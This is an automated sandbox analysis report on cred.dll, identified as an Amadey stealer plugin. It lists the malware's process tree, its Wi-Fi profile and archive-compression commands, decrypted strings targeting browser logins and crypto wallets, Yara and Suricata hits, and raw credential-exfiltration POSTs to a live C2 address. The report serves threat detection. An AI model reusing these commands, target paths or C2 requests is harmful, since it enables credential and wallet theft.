Windows Analysis Report
cred.dll

Overview

General Information

Sample name: cred.dll
Analysis ID: 1620561
MD5: fd8df0fc2168cb8c7959afaffa4d8031
SHA1: 1715f77ca9c2d09d3fbbd5e42ae506be4157d961
SHA256: 50f6ef79d5f5ba167a875bbf1438b8ff42a46ac5537127bb5a51f87bdc611620
Tags: dll, user-skocherhan

Detection

Amadey
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7636 cmdline: loaddll32.exe "C:\Users\user\Desktop\cred.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7724 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7748 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • netsh.exe (PID: 7772 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8016 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7732 cmdline: rundll32.exe C:\Users\user\Desktop\cred.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 7796 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 8128 cmdline: rundll32.exe C:\Users\user\Desktop\cred.dll,Save MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7432 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 1152 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1868 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7420 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",Save MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Extracted malware configuration: {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
Source: cred.dll
Rule: JoeSecurity_Amadey_2
Description: Yara detected Amadey's stealer DLL
Author: Joe Security

Source: cred.dll
Rule: loader_amadey_stealer_plugin
Description: Finds Amadey's stealer plugin based on characteristic strings
Author: Sekoia.io
Strings:
    • 0xfecec:$str01: STEALERDLL.dll
    • 0xfb0c0:$str02: ?wal=1
    • 0xfaffa:$str03: Content-Disposition: form-data; name="data"; filename="
    • 0xfb2c8:$str09: "hostname":"([^"]+)"
    • 0xfb2e0:$str10: "encryptedUsername":"([^"]+)"
    • 0xfb300:$str11: "encryptedPassword":"([^"]+)"
    • 0xfbb2c:$str12: &cred=

    System Summary

    Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe
    Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), frack113, Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe
    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe

    Stealing of Sensitive Information

    Source: Process started, Author: Joe Security, Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7748, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 7772, ProcessName: netsh.exe

    Suricata IDS alerts:
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-02-21T01:53:33.351067+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 185.196.8.37 | 80 | TCP
    2025-02-21T01:53:33.351091+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 185.196.8.37 | 80 | TCP
    2025-02-21T01:53:40.177381+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 185.196.8.37 | 80 | TCP

    AV Detection

    Source: http://185.196.8.37/Gd85kkjf/index.php, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1/, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=13, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1E, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1yq, Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=13l, Avira URL Cloud: Label: malware
    Source: cred.dll, Malware Configuration Extractor: Amadey {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
    Source: cred.dll, ReversingLabs: Detection: 76%
    Source: cred.dll, Virustotal: Detection: 81%
    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.3% probability
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, String decryptor (decrypted strings recovered from this memory dump):
    • \Mozilla\Firefox\Profiles\
    • Taskkill /IM ArmoryQt.exe /F
    • Exodus\exodus.wallet\
    • _Electrum(
    • Electrum.exe
    • electrum_data\wallets
    • Electrum\wallets
    • Litecoin\wallets
    • 185.196.8.37
    • /Gd85kkjf/index.php
    • \logins.json
    • tdata\key_datas
    • \user_data
    • \dictionaries
    • Telegram.exe
    • CentBrowser
    • key=clear
    • atomic\Local Storage\
    • _Telegram(
    • _Desktop.zip
    • DashCore\wallets\
    • \SputnikLab\Sputnik\User Data\Local State
    • \CentBrowser\User Data\Local State
    • \Chedot\User Data\Default\Login Data
    • \Google\Chrome\User Data\Default\Login Data
    • \Vivaldi\User Data\Default\Login Data
    • \Google\Chrome\User Data\Local State
    • \Microsoft\Edge\User Data\Default\Login Data
    • \Microsoft\Edge\User Data\Local State
    • \Orbitum\User Data\Default\Login Data
    • \Comodo\Dragon\User Data\Default\Login Data
    • \Comodo\Dragon\User Data\Local State
    • Taskkill /IM "Atomic Wallet.exe" /F
    • \Chromium\User Data\Default\Login Data
    • \CocCoc\Browser\User Data\Default\Login Data
    • \CocCoc\Browser\User Data\Local State
    • \Opera Software\Opera Stable\Login Data
    • \CentBrowser\User Data\Default\Login Data
    • \Opera Software\Opera Stable\Local State
    Source: cred.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: cred.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\dll\mscorlib.pdbA8? source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1738172284.0000019048E1B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1605350402.00000182F79CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb2 source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt` source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3281DD402BA65B9201D60593E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F74750E5975C64E2189F source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user\AppData
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user\Music\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Users\user\OneDrive\desktop.ini

    Networking

    Source: Network traffic, Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49708 -> 185.196.8.37:80
    Source: Network traffic, Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49707 -> 185.196.8.37:80
    Source: Network traffic, Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49706 -> 185.196.8.37:80
    Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 185.196.8.37 80
    Source: Malware configuration extractor, IPs: 185.196.8.37
    Source: global traffic, HTTP traffic detected (the same request was observed three times):
        POST /Gd85kkjf/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.196.8.37
        Content-Length: 21
        Cache-Control: no-cache
        Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
        Data Ascii: id=246122658369&cred=
    Source: global traffic, HTTP traffic detected:
        POST /Gd85kkjf/index.php?wal=1 HTTP/1.1
        Content-Type: multipart/form-data; boundary=----NjE0Mw==
        Host: 185.196.8.37
        Content-Length: 6303
        Cache-Control: no-cache
    Source: Joe Sandbox View, ASN Name: SIMPLECARRER2IT
    Source: unknown, TCP traffic detected without corresponding DNS query: 185.196.8.37 (this entry is repeated 50 times in the report)
    Source: unknown, HTTP traffic detected:
        POST /Gd85kkjf/index.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        Host: 185.196.8.37
        Content-Length: 21
        Cache-Control: no-cache
        Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
        Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/-A2D8-08002B30309D
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/=1
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000315A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php%q
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1/
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=13
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=13l
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1E
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1yq
    Source: powershell.exe, 00000014.00000002.1737600529.0000019048DF9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.m
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1608704623.00000182F7A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A262161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.00000190309B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000014.00000002.1570212406.0000019031ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031CC0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.0000018281625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019031FD8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000014.00000002.1570212406.0000019030BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000B.00000002.1506648426.000002A263A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1622167122.000002A2721D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1566797519.0000018290073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1503755428.00000182818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570212406.0000019032286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1716912917.0000019040A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

Source: cred.dll, type: SAMPLE | Matched rule: Finds Amadey's stealer plugin based on characteristic strings Author: Sekoia.io
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFB4B06D3C0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFB4B06D159
    Source: cred.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: cred.dll, type: SAMPLE | Matched rule: loader_amadey_stealer_plugin author = Sekoia.io, description = Finds Amadey's stealer plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 50154e39-98b3-40e5-8986-18bbb7b15647
    Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winDLL@32/22@0/1
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
    Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\_Files_\
    Source: cred.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Main
    Source: rundll32.exe, 00000004.00000002.1680276783.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1680276783.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.000000000315A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Note: the statement above is the schema of the password_notes table in Chromium's Login Data SQLite database (it references the logins table); its presence in rundll32.exe memory while cred.dll is loaded is consistent with the browser-credential-harvesting signatures listed in the overview.
    Source: cred.dll | ReversingLabs: Detection: 76%
    Source: cred.dll | Virustotal: Detection: 81%
    Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cred.dll"
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
